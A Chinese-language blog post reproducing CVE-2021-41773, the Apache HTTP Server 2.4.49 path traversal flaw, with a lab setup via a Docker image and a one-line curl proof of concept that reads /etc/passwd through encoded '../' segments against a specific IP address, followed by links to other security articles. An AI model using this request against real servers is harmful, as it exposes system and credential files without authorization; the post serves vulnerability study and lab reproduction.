常见中间件漏洞复现之【Apache】!

CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件
在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
--------------------

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
-------------------

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
-------------------

漏洞复现

打开网页

使用poc

复制代码
curl http://1.15.136.212:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
key061 小时前
《数据出境安全评估办法》企业应对策略
网络·人工智能·安全
AORO20252 小时前
遨游科普:什么是对讲机?没有网络的山区对讲机可以用吗?
网络·5g·安全·信息与通信
Hello.Reader4 小时前
Kafka 安全SASL 认证全栈实战从 JAAS 到 Kerberos、PLAIN、SCRAM、OAUTH 与委托令牌
分布式·安全·kafka
xixixi777774 小时前
SOC(安全运营中心)
网络·安全·soc·安全运营中心
介一安全13 小时前
【APK安全】组件安全核心风险与防御指南
网络安全·安全性测试·apk安全
lypzcgf15 小时前
Coze源码分析-资源库-编辑插件-后端源码-安全与错误处理
安全·插件·coze·coze源码分析·智能体平台·ai应用平台·agent平台
粟悟饭&龟波功16 小时前
【网络安全】一、入门篇:读懂 HTTP 协议
安全·web安全·http
骥龙16 小时前
粤港澳全运会网络安全防御体系深度解析:威胁态势与实战防护
网络·安全·web安全
安娜的信息安全说18 小时前
企业身份认证系统选型:Azure AD 与 Keycloak 功能详解
安全·microsoft·keycloak·azure ad
2501_9181269119 小时前
apache 服务器如何使用
运维·服务器·apache